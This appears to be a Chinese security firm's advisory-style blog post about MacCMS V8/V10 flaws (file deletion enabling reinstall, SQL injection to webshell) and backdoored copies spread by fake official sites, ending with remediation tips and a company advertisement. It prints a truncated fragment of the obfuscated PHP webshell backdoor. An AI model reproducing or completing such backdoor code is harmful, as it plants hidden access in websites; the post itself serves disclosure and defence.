苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

时间：2020-01-07作者：青岛四海通达电子科技有限公司浏览：137

目前苹果CMS官方在不断的升级补丁，官方较新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击，很多客户因此找到我们SINE安全寻求网站安全技术上的支持，针对该漏洞我们有着*特的安全解决方案以及防止挂马攻击的防护，包括一些未公开的maccms POC漏洞都有修复补丁。

目前maccms官方被百度网址安全中心提醒您：该站点可能受到黑客攻击，部分页面已被非法篡改！ 苹果官方网站因为特殊原因已经停止访问，该内容被禁止访问，但是升级补丁更新的网址还是可以打开的。

截图如下：

苹果CMS漏洞详情：

苹果CMS V8 V10版本存在代码重装漏洞，以及代码后门漏洞，任意文件删除漏洞，通过CNVD-2019-43865的信息安全漏洞通报，可以确认maccms V10存在漏洞，可以伪造恶意代码发送到网站后端进行执行，可以删除网站目录下的任意文件，可删除重装苹果CMS系统的配置文件，导致可以重新安装maccms系统，并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。

苹果CMS V8 V10 源代码存在后门漏洞，经过我们SINE安全技术的检测发现，存在后门的原因是，目前百度搜索苹果官网，maccms官方，排在百度搜索首页的都是仿冒的网站，包括模板，图片，以及CSS跟真正的官方是一模一样，很多客户都是点击到这个**网站上去进行下载的源代码，该代码里隐藏了木马后门文件,阿里云都无法检测出来，

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 标题

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代码如上面所示，是加密过的，经过我们SINE安全的解密发现是PHP的脚本木马，可以绕过各大服务器厂商的安全检测，包括阿里云，腾讯云，百度云，华为云。

关于苹果CMS网站漏洞的修复方案与办法

对任意文件删除漏洞做安全过滤与检查，防止del删除的语句的执行，对前端传输过来的参数进行严格的检测，不管是get,post,cookies，如果您对代码不是太懂的话也可以找专业的网站安全公司来处理解决苹果CMS网站被攻击的问题，或者是对重装文件进行改名以及安装配置文件进行权限设置，只读权限，对于存在网站木马后门的苹果cms系统，人工对代码进行安全审计，对所有网站目录下每个代码文件都要仔细的排查，可以下载官方的源代码进行比对。


青岛四海通达电子科技有限公司专注于服务器安全,网络安全公司,网站安全防护,网站漏洞检测,渗透测试,网站安全,网站漏洞扫描,网站安全检测等, 欢迎致电 13280888826

• 词条

  词条说明

• 网站安全检测的必要性

  网站安全检测是指通过对网站的系统性测试，发现其中存在的安全漏洞并提供解决方案的过程。网站安全检测的必要性主要有以下几个方面：预防攻击：网站是企业在互联网上的门面，如果网站存在安全漏洞，可以利用漏洞对网站进行攻击，导致网站被篡改、瘫痪甚至被重要信息。做好网站安全检测可以及早发现漏洞并加以修复，预防攻击，**网站的安全性和稳定性。提高用户信任度：网站安全检测和修复可以提高用户的信任度，让用户更加放心地

• 苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

  目前苹果CMS官方在不断的升级补丁，官方较新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击，很多客户因此找到我们SINE安全寻求网站安全技术上的支持，针对该漏洞我们有着*特的安全解决方案以及防止挂马攻击的防护，包括一些未公开的maccms POC漏洞都有修复补丁。目前maccms官方被百度网址安全中心提醒您：该站点可能受到黑客攻击，部分页面已被非法篡改！ 苹果

• 网络安全公司 网络安全小技巧

  网络安全公司 网络安全小技巧一、保持更新。不但要坚持更新操作系统，还要保持较新版本的杀毒软件等常用应用软件。二、密码安全。同样的密码不要用多处；密码用的长一点（如：15位）；提供密码强度，建议使用**字符+字母+数字组合；账号密码多的建议使用专业的密码管理软件。三、软件安全。电脑病毒虽然看起来走在安全软件前，但是安全软件仍然可以帮你挡住大量的恶意软件；让你的杀毒软件和安全软件保持较新状态。四、时刻

• 为什么网站被黑客攻击

  大家都听说过黑客，知道他们的技术很牛，可以轻而易举就破坏一般的技术防护，让你的网站服务器瘫痪，他们会篡改数据进行非法活动，有些获取数据以后进行批量转卖，获取非法利益，还有些是以编写入侵系统为生，进行着违法的勾当，这个黑客产业链很强大，而且他们的技术都在不断的升级迭代，有时候他们会做到无声无息。我们普通用户一般很难发现，今天有一个客户咨询我，说为什么他的一个网站的信息显示在一个*网站上？我说这是人